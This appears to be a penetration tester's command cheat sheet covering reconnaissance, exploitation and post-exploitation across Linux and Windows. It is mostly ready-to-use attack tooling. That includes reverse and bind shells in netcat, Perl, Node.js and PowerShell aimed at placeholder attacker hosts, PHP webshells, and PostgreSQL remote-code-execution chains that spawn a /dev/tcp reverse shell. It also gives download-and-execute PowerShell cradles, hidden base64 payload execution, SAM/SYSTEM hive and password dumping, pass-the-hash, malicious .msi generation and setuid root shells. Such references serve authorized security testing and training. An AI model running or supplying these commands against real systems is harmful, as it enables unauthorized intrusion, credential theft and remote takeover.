nc -lnvp port_here -e /bin/bash
# push reverse shell
nc -nv attacker_IP port_here -e cmd.exe
nc -nv attacker_IP port_here -e /bin/bash
nc -e cmd attacker_IP port_here
nc -e /bin/bash attacker_IP port_here
# monitor port
watch -n 1 nc -w 1 -nvvvz IP_here port_here
# add new user
net user user_here password_here /add
# add new user to domain
net user user_here password_here /add /domain
# add user to group
net group "group_name_here" /add user_here
# make user local admin
net localgroup administrators /add user_here
# show local admins
net localgroup administrators
# show domain admins
net localgroup administrators
net group "Domain Admins" /domain
# display user information
net user user_here /domain
# enumerate shares
net view IP_here
# enumerate domains available to host
net view /domain
# list hosts in current domain
net view
# list hosts in some_other_domain
net view /domain:some_other_domain_name_here
# show domain controllers for current domain
net group "Domain Controllers" /domain
# test for null session on share
net use \\IP_here\IPC$ '' /u:''
# stop service
net stop service_name_here
# (re)start service
net start service_name_here
# scan host / site
nikto -h host_site_here
# scan host / site on port
nikto -h host_site_here -p port_here
# scan host / site with authentication
nikto -h host_site_here -i user_here:password_here
# prepare Nishang reverse shell
Invoke-PowerShellTcp -Reverse -IPAddress IP_here -Port port_here
# list functions from system library
## libc
nm -D /lib/$(uname -m)/libc-*.so | grep -vw U | grep -v "_" |cut -d " " -f 3
# ping sweep
nmap -sn IP_range
nmap -sP IP_range
nmap -sn -iL IP_list_file_here
# scan IPv6
nmap -6 domain_here
# sweep network
nmap -p port_here target_range_here
# OS fingerprinting
nmap -Pn -O IP_here
# aggressive OS scan
nmap -Pn -O --osscan-guess IP_here
# gentle OS scan (limit detection to promising hosts)
nmap -Pn -O --osscan-limit IP_range
# TCP connection scan
nmap -sT target_here
# TCP SYN scan
nmap -sS target_here
nmap target_here
# TCP version scan (banner grabbing)
nmap -sV target_here
# run default scripts
nmap -sC target_here
# aggressive scan
nmap -A target_here
# UDP scan
nmap -sU target_here
# UDP + TCP SYN scan
nmap -sU -sS target_here
# possible target identifiers
nmap -some_scan DNS_here
nmap -some_scan IP_list_here
nmap -some_scan IP_with_wildcard_here
nmap -some_scan IP_range_list_here
nmap -some_scan CIDR_list_here
nmap -some_scan -iL IP_list_file_here
# more info on scan
nmap --reason -p port_here target_here
# show all available scripts
locate -r '\.nse$'
# show all available scripts with categories
locate -r '\.nse$' | xargs grep categories
# run some_script in debug mode
nmap --script some_script -p port_here IP_here -d
# show script help
nmap --script-help script_name_here
# update script DB
sudo nmap --script-updatedb
# run script with args
nmap --script some_script -p port_here IP_here --script-args "script_name_here.arg_name_here='arg_value_here', script_name_here.another_arg_name_here='arg_value_here'"
# check all available scripts for protocol
ls -1 /usr/share/nmap/scripts/protocol_here-*
# run all protocol scripts
nmap -p port_here --script protocol_here-* target_IP
# run all category (safe, vuln, exploit) scripts
nmap --script category_here target_IP
# pair protocol + categorie scripts
nmap --script "*protocol_here or category_here" target_IP
nmap --script "*protocol_here and category_here" target_IP
# check supported HTTP methods
nmap -p 443 --script http-methods --script-args http-methods.url-path='/my/path/here' url_here
# quick vulnerability scan
nmap --script vuln IP_here
# light http enumeration
nmap --script http-enum IP_here
# spoof IP
nmap -S spoof_IP_here target_IP_here
# full scan
nmap -sT -sV --open --top-ports 3333 -reason -Pn --min-hostgroup 32 -iL scope.txt -oA nmapRangesAllNoScript
# reverse shell
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/bash",[]);
var client = new net.Socket();
client.connect(port_here, "attacker_IP_here", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /check your listener/;
})();
# find hostname of IP_here
nslookup
server DNS_IP_here
127.0.0.1
IP_here
# check for DKIM
# synchronize time of local machine with remote server
ntpdate remote_server_IP_here
# enumerate NTP
nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 IP_here
# disassemble binary
objdump -d /path/to/binary/here
# run all modules, brute-force creds
/path/to/odap all -s IP_here -p 1521
# run all modules, known SID
/path/to/odat all -s IP_here -p 1521 -d SID_here
# run all modules, known creds
/path/to/odat all -s IP_here -p 1521 -d SID_here -U user_here -P password_here
# banner grabbing http (2 empty lines required between headers + body!)
openssl s_client -connect target_IP:443
HEAD / HTTP/1.1
# banner / cert grabbing ftp
openssl s_client -connect target_IP:21 -starttls ftp
# genereate self-signed cert
openssl req -newkey rsa:2048 -nodes -keyout myprivkey.key -x509 -days 362 -out mycert.crt
# import client certificate
## extract .pem
openssl pkcs12 -in certificate_name_here.pfx -nocerts -out certificate_name_here.pem -nodes
## extract .crt
openssl pkcs12 -in certificate_name_here.pfx -nokeys -out certificate_name_here.crt -nodes
## copy to /usr/local/share/ca-certificates/
sudo cp certificate_name_here.crt /usr/local/share/ca-certificates/certificate_name_here.crt
## update
sudo update-ca-certificates
# import burp certificate (e.g. for use in scripts)
openssl x509 -inform der -in cacert.der -out burp.pem
# convert markdown to pdf
pandoc -s -o out_file_here.pdf markdown_file_here.md
# convert markdown to docx, styled according to reference_document_here
pandoc markdown_file_here.md -o out_file_here.docx --highlight-style=tango --reference-doc=/path/to/custom_reference_doc_here.docx
# execute commands
import os
os.system("command_here")
# crack password-protected pdf
pdfcrack -f /path/to/pdf -w /path/to/wordlist
# WinPEAS
## add registry key
reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
## reopen cmd
## run all checks
.\winPEASany.exe quiet cmd fast
## run service checks
.\winPEASany.exe quiet servicesinfo
# generate string of 20 A + concatenate with ABCD
$(perl -e 'print "\x41" x 20 . "ABCD"')
# reverse shell
perl -e 'use Socket;$i="attacker_IP_here";$p=port_here;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
# reverse shell without bash/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr, "IP_here:port_here");STDIN->fdopen($c,r);$~->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# upgrade shell
perl -e 'exec "/bin/bash"'
# perl with setuid capability? --> spawn root shell
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
# calcute md5 for each string/line in file + print to out
cat strings_here.txt |perl -MDigest::MD5=md5_hex -nlE'say"".md5_hex($_)' > out
# dump PGP info
pgpdump private_key_here
pgpdump signed_message_here
sq packet dump -x --mpis signed_message_here
# interactive mode
php -a
# webshell - define http request variables : parameter can be used in subsequent GET + POST requests
<?php system($_REQUEST['parameter_name_here']); ?>
<?php system($_GET['cmd']); ?>
<?= system($_GET['cmd']); ?> # .pht
# HTTP server
php -S 0.0.0.0:port_here
# data wrapper
data:text/plain,data_content_here
# wrapped RCE
data:text/plain,<?php echo shell_exec("command_here") ?>
# execute commands
system()
shell_exec()
passthru()
# run php script
php -f /path/to/script.php
# connect to mysql db
<?php
mysql_connect("IP_here", "mysql_username_here", "password_here") or die(mysql_error());
mysql_select_db('db_name_here');
$res = mysql_query('select password from passwd where user_name="root"'); # mysql query here
$str = mysql_fetch_array($res);
$val = $str['password']; # read out value from results array
print $val;
?>
# send HTTP header
header('header_name_here: value_here');
header('header_name_here: ' . $variable_with_value_here);
# file read
<?php
echo '<pre>';
$result = readfile("filename_here");
echo $result;
echo '</pre>';
?>
# install pip package
## PY2
python -m pip install package
pip install package
## PY3
python3 -m pip install package
pip3 install package
# install specific package version
## PY2
python -m pip install package==version_here
pip install package==version_here
## PY3
python3 -m pip install package==version_here
pip3 install package==version_here
# install requirements
pip install -r requirements.txt
# create requirements.txt
pipreqs
# force create requirements.txt
pipreqs --force
# transfer plink.exe to victim, e.g. with certutil
# remote port forwarding from attacker_IP:listening_port to Windows box:service_port via SSH
cmd.exe /c echo y | plink.exe -ssh -l user_name_here -pw password_here -R attacker_IP_here:listening_port_here:127.0.0.1:service_port_here attacker_IP_here
# connect
nc -nv IP_here 110
telnet IP_here 110
openssl s_client -connect IP_here:995 -quiet -crlf
# log in as user
USER user_name_here
PASS password_here
# show stats
STAT
# show server capabilities
CAPA
# list messages
LIST
# retrieve specific message
RETR id_here
# delete specific message
DELE id_here
# reset / undo changes
RSET
# head specific message
TOP msg id_here
# quit
QUIT
# log in
psql -h IP_here -U user_here
psql -h IP_here -U user_here -p port_here
# default creds
postgres:postgres
# dump usernames + password hashes
SELECT usename, passwd from pg_shadow;
# show databases
\l
SELECT datname from pg_database;
# use database
\c database_here
# list tables
## all
SELECT * from pg_catalog.pg_tables;
## only user-generated
SELECT * from pg_catalog.pg_tables WHERE schemaname != 'pg_catalog' AND schemaname != 'information_schema';
# directory listing (file system)
SELECT * FROM pg_ls_dir('/path/to/folder_here');
# LFI file read (file system)
SELECT * FROM pg_read_file('/path/to/file_here', 0, 1000000);
# write (text) file to disk
copy (select convert_from(decode('b64_encoded_payload_here','base64'),'utf-8')) to '/path/to/outfile';
# show path to postgresql.conf
SHOW config_file;
# file write on server as db_user
## write into large object
SELECT lo_from_bytea(0,'data here');
## (optional) check what has been written
SELECT query_to_xml('SELECT * FROM pg_largeObject',true,true,'');
SELECT query_to_xml('SELECT * FROM pg_largeObject WHERE loid=''OID_here''',true,true,'');
## write to file
SELECT lo_export(OID_here,'/path/to/file');
## (optional) check file
SELECT * from pg_read_file('/path/to/file' , 0 , 1000000);
# overwrite file
## read file into large object
SELECT lo_import('/path/to/file');
## export file content
SELECT query_to_xml('SELECT * FROM pg_largeObject',true,true,'');
## b64 decode + modify content locally
## overwrite large object with modified data
### overwrite entire large object
SELECT lo_put(OID_here,0,'modified_data_here');
### append to or replace substring within large object (will enlargen large object if necessary)
SELECT lo_put(OID_here,start_offset_here,'data_here');
## write to file
SELECT lo_export(OID_here,'/path/to/file');
# get RCE (overwrite config)
## check current config
### get path to config file
SHOW config_file;
### read config file : ssl_key_file, ssh_passphrase_command, ssh_passphrase_supports_reload
SELECT * from pg_read_file('/path/to/config' , 0 , 1000000);
## download private key
### read private key into large object
SELECT lo_import('/path/to/private/key');
### dump private key from large object
SELECT query_to_xml('SELECT * FROM pg_largeObject',true,true,'');
## b64 decode key
cat /path/to/key |base64 -d >out.key
## add passphrase to key
sudo openssl rsa -aes256 -in out.key -out out_with_passphrase.key
## update config file
### read config file into large object
SELECT lo_import('/path/to/config/file');
### comment out original path to private_key
SELECT lo_put(OID_here,3959,'\x23');
### append new content to config large object
SELECT lo_put(OID_here,45000,'ssl_key_file = ''/path/to/writable/folder/here/key_here.key''
ssl_passphrase_command = ''bash -i >& /dev/tcp/IP_here/port_here 0>&1''
ssl_passphrase_command_supports_reload = on');
### write modified config file to disk
SELECT lo_export(OID_here,'/path/to/config/file');
## update key
### write new key to large object
SELECT lo_from_bytea(0,'private_key_with_passphrase_content_here');
### (optional) verify new content + b64 decode
SELECT query_to_xml('SELECT * FROM pg_largeObject WHERE loid=''OID_here''',true,true,'');
### write modified private key to disk
SELECT lo_export(OID_here,'/path/to/writable/folder/here/key_here.key');
## reload config
SELECT pg_reload_conf();
# get RCE
## set up table
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
## execute command
COPY cmd_exec FROM PROGRAM 'id';
## print output
SELECT * FROM cmd_exec;
## spawn reverse shell
COPY cmd_exec FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.49.169:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
## when done
DROP TABLE IF EXISTS cmd_exec;
# download powercat
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
# load powercat
. .\powercat.ps1
# transfer file
## listen
nc -lnvp port_here > /path/to/outfile
## send
powercat -c attacker_IP -p port_here -i C:\path\to\infile
# reverse shell
powercat -c attacker_IP -p port_here -e cmd.exe
# bind shell
powercat -l -p port_here -e cmd.exe
# generate stand-alone bind shell, base64-encoded
powercat -c attacker_IP -p port_here -e cmd.exe -ge > outfile.ps1
# run
powershell -E content_of_outfile.ps1
# execute commands via cmd
cmd.exe /c command_here
C:\Windows\System32\cmd.exe /c command_here
# run on linux
pwsh
# print powershell version
echo $PSVersionTable
$PSVersionTable.PSVersion
# print .NET version
cd C:\Windows\Microsoft.net\Franework64
dir
cd latest_v_folder_here
Get-Item clr.dll | fl
<google ProductVersion value>
# get execution policy
Get-ExecutionPolicy
Get-ExecutionPolicy -Scope CurrentUser
# set execution policy
Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -Force
# bypass execution policy (allow unsigned scripts)
powershell -ExecutionPolicy Bypass -File script_here.ps1
# import module
Import-Module module_name_here
# install module
Install-Module -Name module_name_here
Install-Module -Name module_name_here -Scope CurrentUser -Force
# grep
Select-String -Path C:\path\here\*.extension_here -Pattern "string_here"
# grep recursively
Get-ChildItem C:\path\to\directory -Filter *.extension_here -Recurse | Select-String "string_here"
# find connections for specific service
netstat -anbo | Select-String service_name_here -Context 1
# search for a file
Get-Childitem –Path C:\ -Recurse –force -ErrorAction SilentlyContinue -Include *.extension_here -File
# search for string in files in current directory + sub folders
Get_ChildItem . -Recurse | Select-String "string_here"
# show user-specific proxy settings
Get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
# download file from web server + run it
IEX(IWR('http://URL_here/file_here'))
Invoke-WebRequest -Uri http://IP_here/path/to/file -OutFile /path/to/outfile
# download file from web server + run it without writing to disk
IEX/New-Object Net.WebClient().downloadString('http://IP_here/path/to/file')
IEX(New-Object Net.WebClient).downloadString('http://IP_here/path/to/file')
# transfer file
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://IP_here/file_here','C:\path\to\outfile')"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://IP_here/path/to/file', '/path/to/outfile')
# read text file
Get-Content file_name_here
# read alternate data stream
Get-Content file_name_here -Stream ads_name_here
# connect to share
New-PSDrive -Name "drive_name_here" -PSProvider "FileSystem" -Root "\\IP_here\share_name_here"
# enable SMBv1
Enable-WindowsOptionalFeature -Online -FeatureName "SMB1Protocol-Client" -All
# check process architecture
[Environment]::Is64BitProcess
# check OS architecture
[Environment]::Is64BitOperatingSystem
# list all processes
Get-Process
# compress .zip (<= powershell 5.0)
Compress-Archive -LiteralPath C:\path\to\files -DestinationPath C:\path\to\out.zip
# uncompress .zip (<= powershell 5.0)
Expand-Archive -LiteralPath C:\path\to\zip -DestinationPath C:\path\to\out\folder
# uncompress .zip (<= .NET 4.5+)
Add-Type -AssemblyName System.IO.Compression.FileSystem
function unzip {param( [string]$ziparchive, [string]$extractpath );[System.IO.Compression.ZipFile]::ExtractToDirectory( $ziparchive, $extractpath )}
unzip "C:\path\to\zip" "C:\path\to\out\folder"
# view file permissions
dir | Get-ACL
# reverse shell
$client = New-Object System.Net.Sockets.TCPClient('IP_here',port_here);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (IEx $data 2>&1 |Out-String);
$prompt = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($prompt);
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush();
}
$client.Close();
# reverse shell one-liner
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('IP_here',port_here);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);$sendback = (IEx $data 2>&1 |Out-String);$prompt = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($prompt);$stream.Write($sendbyte, 0, $sendbyte.Length);$stream.Flush();}$client.Close()"
# bind shell
$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);
$listener.Start();
$client = $listener.AcceptTcpClient();
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (IEx $data 2>&1 |Out-String);
$prompt = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($prompt);
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush();
}
$client.Close();
$listener.Stop();
# bind shell one-liner
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.Start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);$sendback = (IEx $data 2>&1 |Out-String);$prompt = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($prompt);$stream.Write($sendbyte, 0, $sendbyte.Length);$stream.Flush();}$client.Close();$listener.Stop()"
# run base64-encoded command
powershell -e base64_payload_here
# run base64-encoded command without popping window
powershell -e base64_payload_here -w hidden
# run base64-encoded command without popping window or loading user profile
powershell -e base64_payload_here -w hidden -nop
# run base64-encoded script
## base64 encode file (bash)
cat script.ps1 | base64 > tmp.txt # encode script
python3 -m http.server port_here # host file
<access http://IP_here:port_here/tmp.txt, Ctrl+A Ctrl-C> # fetch + copy file in browser
## read file content into variable (in (AMSI-bypassed, optionally) powershell shell)
$content = "base64_data_here"
## decode base64-data to load script into memory
IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($content)))
## call powershell method from script
Invoke-pwsh_method_name_here
# base64 encode file
$content = Get-Content /path/to/file
## read bytes into variable
$bytes = [System.Text.Encoding]::Unicode.GetBytes($content)
## base64 encode bytes
[Convert]::ToBase64String($bytes)
# base64 decode file
[Convert]::FromBase64String("base64_string_here")
# run as other user
powershell -c "$username = 'user_name_here'; $passwd = 'password_here';$secpasswd = ConvertTo-SecureString $passwd -AsPlainText -Force; $mycreds = New-Object System.Management.Automation.PSCredential $username,$secpasswd; Start-Process C:\path\to\shell.exe -Credential $mycreds"
# start service + display status
Start-Service "service_name_here" -PassThru
# stop service + display status
Stop-Service "service_name_here" -PassThru
# restart service + display status
Restart-Service "service_name_here" -PassThru
# display service status
Get-Service service_name_here
# show all services
Get-Service
# show all running services
Get-Service | Where-Object {$_.Status -eq "Running"}
# list installed software
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName
# check software version
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Where-Object {($_.DisplayName -eq " Software Name Here")}
# rename file
Rename-Item C:\path\to\file\old\name C:\path\to\file\new\name
# remove file
Remove-Item C:\path\to\file
# reboot localhost
Restart-Computer .
# ping host
Test-Connection -ComputerName computer_name_here -ErrorAction Stop -Count 1
Test-Connection -ComputerName IP_here -ErrorAction Stop -Count 1
# test connectivity (catch with http server)
powershell.exe IWR IP_here:port_here
# bypass UAC
## !! won't work if ConsentPromptBehaviorAdmin == 2 && PromptOnSecureDesktop == 1 !!
## check whether UAC is enabled
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
## 0 = UAC disabled, 1 = UAC enabled
EnableLUA : 1
## 0 = Elevate without prompting
## 2 = Prompt for consent on Secure Desktop
## 5 = Prompt for consent for non_Windows binaries (default)
ConsentPromptBehaviorAdmin : 5
## 0 = don't prompt, 1 = prompt
PromptOnSecureDesktop : 1
# run scheduled task as user_name_here (e.g. Administrator)
## configure creds
$pwd = ConvertTo-SecureString "password_here" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("username_here", $pwd)
## set up scheduled task
Invoke-Command -Computer computer_name_here -ScriptBlock { schtasks /create /sc onstart /tn task_name_here /tr C:\path\to\revshell.exe /ru SYSTEM } -Credential $creds
## run scheduled task
Invoke-Command -Computer computer_name_here -ScriptBlock { schtasks /run /tn task_name_here } -Credential $creds
# run PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecks
# decompile .jar
procyon -jar /path/to/jar -o /path/to/out/directory
# dynamic port forwarding : set local listening port + tunnel traffic through proxy to any destination reachable by proxy
## set up ssh tunnel : dynamic SOCKS4 proxy
sudo ssh -N -D 127.0.0.1:port_here username_here@proxy_IP_here
## configure proxychains to direct any local application traffic through ssh tunnel
nano /etc/proxychains.conf # proxychains-ng : /etc/proxychains4.conf
[ProxyList]
socks4 127.0.0.1 port_here
# prepend each command on kali
sudo proxychains command_here
sudo proxychains4 command_here
# nmap over proxychains (TCP-based scans only)
nano /etc/proxychains.conf # proxychains-ng : /etc/proxychains4.conf
## comment out proxy_dns
# proxy_dns
## comment out any other socks4 proxy (e.g. tor)
# socks4 127.0.0.1 9050
## start scan (SYN scan not working, any non-TCP protocol not working over proxychains)
sudo proxychains nmap -sT -Pn target_IP
sudo proxychains4 nmap -sT -Pn target_IP
# proxied shell
## set up ssh tunnel : dynamic SOCKS5 proxy
sudo ssh -N -D 127.0.0.1:port_here username_here@proxy_IP_here
## configure proxychains to direct any local application traffic through ssh tunnel
nano /etc/proxychains.conf # proxychains-ng : /etc/proxychains4.conf
[ProxyList]
socks5 127.0.0.1 port_here
# spawn proxied shell
PROXYCHAINS_SOCKS5=port_here proxychains bash
PROXYCHAINS_SOCKS5=port_here proxychains4 bash
# burp over proxychains
Burp > User options > SOCKS proxy
# firefox over proxychains
## fire up ssh tunnel
sudo ssh -N -D 127.0.0.1:proxychains_port_here user@pivot_IP
## configure foxyproxy for 127.0.0.1:proxychains_port_here + activate
# authenticate to SMB with pass-the-hash + execute command
pth-winexe -U domain_here/user_name_here%LM+NTLM_hash_here //SMB_share_here command_here
# dump passwords
.\PwDump7.exe
# dump passwords from registry hives
.\PwDump7.exe -s SAM.save SYSTEM.save
# start local process
p = process('/path/to/binary')
# start remote process
p = remote('IP_here', port_here)
# receive data
p.recv(number_of_bytes_to_receive_here)
## receive up until delimiter + include delimiter in data
p.recvuntil(delimiter_here,drop=False)
## receive up until delimiter + exclude delimiter from data
p.recvuntil(delimiter_here,drop=True)
p.recvline(keepends=True) # same as p. recvuntil('\n',drop=keepends)
## receive all data until timeout
p.clean(timeout=0.03) # seconds
# send data
data = "my data here" # string or bytes
p.send(data)
p.sendline(data) # same as p.send(data + '\n')
# print to screen
log.info('some string here')
## hex address
hex_address = u32(p.recvline()[:4])
log.info('some string here:{}'.format(hex(hex_adress)))
# user python path from env
#!/usr/bin/env python
#!/usr/bin/env python3
# FTP server
## server
python3 -m pyftpdlib -p 21 -w
## target : prepare comamnds
echo "open IP_here" > ftp.txt
echo "USER username_here" >> ftp.txt
echo "PASS password_here" >> ftp.txt
echo binary >> ftp.txt
echo "GET filename_here" >> ftp.txt
echo bye >> ftp.txt
## target : run commands
ftp -v -n -s:ftp.txt
# HTTP server
python -m SimpleHTTPServer 80
python3 -m http.server 80
# concatenate characters + bytes (BOF)
print(b'char_here' * factor_here + b'\xbyte_here\xanother_byte_here')
# interact with executable - run and attach proces
io = process("/path/to/executable/here")
# interact with executable - attach to remote server
io = remote("server_IP_here", port_here)
# interact with executable - send data
io.sendlineafter("last_char/string_received ","char/string_to_send")
# interact with executable - receive data
io.recvline()
io.recvline().strip()
io.recvline().strip().split()
io.recvline().strip().split()[-1]
# interact with executable - get interactive prompt
io.interactive()
# create cyclic string
from pwn import *
cyclic(length_here)
# find substring in cyclic string
cyclic_find("substring_here")
# read file line per line
with open("file_name_here","mode_here",encoding="encoding_here") as file:
for line in file:
do_something
# upgrade shell
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
# simple connection script
## PY2
#!/usr/bin/env python2
import socket
# set up socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target_ip = "IP_here"
target_port = port_here
payload = "payload_here"
try:
# establish connection
s.connect((target_ip, target_port))
# *optional* if service has banner : receive + print data
data = s.recv(4096)
print data
# send payload
s.send(payload)
# receive server response + print to screen
data = s.recv(4096)
print data
# close connection
s.close()
except:
print "Connection failed!"
## PY3
#!/usr/bin/env python3
import socket
# set up socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target_ip = "IP_here"
target_port = port_here
payload = b"payload_here"
try:
# establish connection
s.connect((target_ip, target_port))
# *optional* if service has banner: receive + print data
data = s.recv(4096)
print(data.decode()) # decode received bytes to string
# send payload
s.sendall(payload)
# receive server response + print to screen
data = s.recv(4096)
print(data.decode()) # decode received bytes to string
# close connection
s.close()
except Exception as e:
print("Connection failed!", e)
# simple script skeleton with functions
## PY3
#!/usr/bin/env python3
import some_library
def main():
some_function()
def some_function():
some_code_here
if __name__ == "__main__":
main()
# simple script with arguments
## PY3
#!/usr/bin/env python3
import argparse
def parse_arguments():
parser = argparse.ArgumentParser(description='my awesome script with args')
# example argument
parser.add_argument('-e', '--example', type=int, default=42, help='example argument with a default value 42')
args = parser.parse_args()
return args
def main():
args = parse_arguments()
example_value = args.example
print(f"example argument value: {example_value}")
if __name__ == "__main__":
main()
# python with setuid capability? --> spawn root shell
python -c 'import pty,os;os.setuid(0);pty.spawn("/bin/bash")'
python3 -c 'import pty,os;os.setuid(0);pty.spawn("/bin/bash")'
# read from file
my_file = open("/path/to/file","r") # r = read, w = write
data = my_file.read() # whole file as string
data = my_file.readline() # one line as string
data = my_file.readlines() # all lines as string element in list
my_file.close()
# strip all whitespace from string
s = "my string here "
stripped = "".join(s.split())
# execute os commands
import os
os.system("command_here")
# PY3 work with hex bytes
bytes = b'\xca\xfe\xca\xfe'.hex() # prints 'cafecafe'
# open binary in debug mode
r2 -d /path/to/binary
# analyze all symbols and entry points in binary (after opening in debug mode)
aa
# output help
?
?command_here
# list all functions
afl
# print function disassembly code
pdf @function_name_here
# set breakpoint
db instruction_address_here
# run program until breakpoint
dc
# print variable content
px @variable_address
# execute next instruction
ds
# print content of registers
dr
# reload program
ood
# connect to rdp machine
rdesktop IP_here
# connect to rdp machine + set up share
rdesktop IP_here -r disk:name_here=/path/to/share/here
# identify function offset from library base
## libc
readelf -s /lib/$(uname -m)-linux-gnu/libc.so.6 | grep "function_name_here"
# search modules
marketplace search keyword_here
# display module info
marketplace info module_name_here
info
# install module
marketplace install module_name_here
# load module
modules load module_name_here
# display stored hosts
show hosts
# enumerate registry information, search recursively for password in HKLM
reg query HKLM /f password /t REG_SZ /s
reg query HKLM /f pass /t REG_SZ /s
# enumerate registry information, search recursively for password in HKCU
reg query HKCU /f password /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s
# create copy of SYSTEM
reg save HKLM\SYSTEM C:\path\to\copy\location\SYSTEM.save
# create copy of SAM
reg save HKLM\SAM C:\path\to\copy\location\SAM.save
# create copy of SECURITY
reg save HKLM\SECURITY C:\path\to\copy\location\SECURITY.save
# bypass UAC
## !! won't work if ConsentPromptBehaviorAdmin == 2 && PromptOnSecureDesktop == 1 !!
## check whether UAC is enabled
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
## 0 = UAC disabled, 1 = UAC enabled
EnableLUA REG_DWORD 0x1
## 0 = Elevate without prompting
## 2 = Prompt for consent on Secure Desktop
## 5 = Prompt for consent for non_Windows binaries (default)
ConsentPromptBehaviorAdmin REG_DWORD 0x5
## 0 = don't prompt, 1 = prompt
PromptOnSecureDesktop REG_DWORD 0x1
# AlwaysInstallElevated
## check whether AlwaysInstallElevated is enabled : 0, disabled, 1 = enabled
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
## generate malicious .msi
### x86
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f msi -a x86 -o shell.msi
### x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f msi -a x64 -o shell.msi
## execute .msi
msiexec /quiet /qn /i C:\path\to\msi
# AutoRuns
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# AutoLogon
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v DefaultPassword
# start responder in analyze mode (monitor traffic)
responder -I interface_here -A
# capture hashes
responder -I interface_here
# force responder to recapture previously captured hashes | verbose mode
responder -I interface_here -v
# crack NTLMv2 (NetNTLM) hash captured with responder
hashcat -m 5600 /path/to/hash /path/to/wordlist
# spawn shell with psexec
impacket-psexec username_here:password_here@IP_here
# identify offending services (startup error)
sudo netstat -antp | grep offending_port_here
## confirm service is running + stop process
sudo systemctl status service_name_here
sudo systemctl stop service_name_here
# configure port forwarding rule for target on proxy
## open config file
sudo nano /etc/rinetd.conf
## bindadress bindport connectaddress connectport
0.0.0.0 listening_port_on_proxy dest_IP dest_port
## restart service
sudo service rinetd restart
## verify listener
ss -plant | grep listening_port_on_proxy
## connect to destination from target
nc -nvv proxy_IP_here listener_port_here
# wrap line on listener
rlwrap nc -lnvp port_here
# enumerate rpcbind
rpcinfo IP_here
# nmap
nmap -sSUC -p 111 IP_here
# show export list for NFS server
showmount -e IP_here
nmap -sV --script=nfs-showmount IP_here
# mount NFS share
mkdir mounted_share
